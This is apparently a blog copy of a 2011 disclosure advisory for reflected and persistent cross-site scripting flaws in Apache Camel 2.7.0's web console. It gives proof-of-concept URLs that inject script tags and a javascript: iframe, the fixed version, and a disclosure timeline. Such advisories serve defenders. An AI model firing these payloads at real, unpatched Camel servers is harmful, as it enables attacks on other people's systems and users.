Apache Camel is a versatile open-source integration framework based on known Enterprise Integration Patterns. Camel empowers you to define routing and mediation rules in a variety of domain-specific languages, including a Java-based Fluent API, Spring or Blueprint XML Configuration files, and a Scala DSL.
Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in Apache Camel. These issues were discovered in a default installation of Apache Camel 2.7.0. Other earlier versions may also be affected.
Proof of concept
Reflected XSS
===========
http://[target]:8161/demo/portfolioPublish?count=1&refresh='"--></style></script><script>alert(/XSS/)</script>&stocks=SUNW
Permanent XSS
============
http://[target]:8161/camel/endpoints/mock:someName<iframe src="javascript:alert('Permanent XSS')"
To trigger Permanent XSS:
====================
http://[target]:8161/camel/endpoints
Solution
Update to version 2.7.2 or later.
Reference
Vendor URL: https://issues.apache.org/jira/browse/CAMEL-3991
Disclosure Timeline
2011-05-06 - Vulnerabilities discovered.
2011-05-06 - Vulnerabilities reported to Secunia.
2011-05-06 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-05-19 - Patch released.
2011-05-19 - Advisory published by Apache.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.